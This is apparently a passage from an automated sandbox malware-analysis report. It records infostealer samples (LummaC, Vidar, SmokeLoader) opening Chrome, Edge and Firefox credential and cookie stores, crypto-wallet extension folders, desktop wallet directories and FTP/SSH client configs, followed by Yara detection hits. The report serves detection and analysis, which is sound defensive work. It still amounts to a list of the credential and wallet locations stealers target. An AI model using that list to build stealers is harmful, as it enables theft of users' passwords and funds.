                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: Yara matchFile source: Process Memory Space: 21AE.exe PID: 5640, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: katA304.tmp PID: 1436, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected CryptOne packer
                  Source: Yara matchFile source: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: Process Memory Space: 21AE.exe PID: 5640, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected SmokeLoader
                  Source: Yara matchFile source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected Vidar
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 12.2.C9A7.exe.42a7719.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.C9A7.exe.2590000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.C9A7.exe.2590000.0.raw.unpack, type: UNPACKEDPE
